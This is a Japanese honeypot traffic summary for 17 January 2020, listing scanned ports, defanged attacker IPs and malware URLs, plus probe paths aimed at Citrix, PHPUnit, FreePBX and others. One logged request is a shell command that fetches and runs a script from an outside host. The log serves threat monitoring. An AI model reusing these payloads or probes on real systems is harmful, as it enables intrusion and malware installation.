【ハニーポット簡易分析】Honeypot簡易分析(2020/1/17)
Honeypot簡易分析(2020/1/17)となります。
Citrix の脆弱性を狙ったスキャン攻撃はHTTPSの方にちょくちょく検知しています。
また、WOWHoneypotのPathの集計にターゲットにしている製品情報を追加するようにしています。
/vpn/[.][.]/vpns/ Target:Citrix ADC/Citrix Gateway 1 件
<Honeytrap>
Local Port Top 10
LocalPort Count
1433 169568 件
445 1465 件
3389 268 件
3388 78 件
2222 73 件
111 43 件
5001 40 件
55553 39 件
Remote IP Top 10
RemoteIP Count
112[.]105[.]220[.]2 22036 件
181[.]39[.]183[.]175 20756 件
93[.]170[.]75[.]163 18722 件
61[.]228[.]16[.]248 17432 件
177[.]128[.]42[.]14 11762 件
180[.]242[.]169[.]30 9521 件
180[.]250[.]197[.]138 9049 件
116[.]111[.]90[.]213 8754 件
Malware
Malware Count
No Malware 175694 件
hxxp://51[.]77[.]213[.]109/mips 5 件
hxxp://91[.]92[.]66[.]124/ 4 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://167[.]172[.]217[.]87/EskDfbins[.]sh 1 件
<wowhoneypot>
URI Path
URI PATH Count
/ Target:- 34 件
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 4 件
/[.]env Target:env 3 件
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
/shell Target:wegshell 3 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 2 件
/TP/public/index[.]php Target:ThinkPHP 2 件
/manager/html Target:Tomcat 2 件
//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
Remote IP Top 10RemoteIP Count
157[.]7[.]190[.]241 70 件
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 7 件
121[.]199[.]74[.]37 3 件
37[.]49[.]231[.]109 3 件
222[.]186[.]19[.]221 2 件
86[.]24[.]119[.]222 1 件
62[.]10[.]93[.]150 1 件
All URI
URI Count
/ Target:- 34 件
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 4 件
/[.]env Target:env 3 件
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//vendor/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//lib/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
/lib/phpunit/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 3 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE Target:wegshell 3 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 2 件
/manager/html Target:Tomcat 2 件
/TP/public/index[.]php Target:ThinkPHP 1 件
/TP/public/index[.]php?s=captcha Target:ThinkPHP 1 件
//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin[.]php Target:PHPUnit 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
<wowhoneypotssl>
URI Path
URI PATH Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/ Target:- 4 件
/vpn/[.][.]/vpns/ Target:Citrix ADC/Citrix Gateway 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 1 件
/403926033d001b5279df37cbbe5287b7c7c267fa00thisisascan Target:new path 1 件
Remote IP Top 10RemoteIP Count
77[.]247[.]108[.]77 16 件
77[.]247[.]108[.]119 7 件
37[.]49[.]231[.]109 2 件
71[.]6[.]202[.]253 1 件
172[.]105[.]4[.]63 1 件
35[.]199[.]66[.]87 1 件
69[.]162[.]123[.]62 1 件
45[.]56[.]78[.]64 1 件
All URI
URI Count
/admin/assets/js/views/login[.]js Target:FreePBX 11 件
/admin/i18n/readme[.]txt Target:text 4 件
/recordings/theme/main[.]css Target:FreePBX 4 件
/admin/config[.]php Target:PHP 4 件
/ Target:- 4 件
/vpn/[.][.]/vpns/ Target:Citrix ADC/Citrix Gateway 1 件
/niceports,/Trinity[.]txt[.]bak Target:text 1 件
/vpn/[.][.]/vpns/cfg/smb[.]conf Target:Citrix ADC/Citrix Gateway 1 件
/403926033d001b5279df37cbbe5287b7c7c267fa00thisisascan Target:new path 1 件
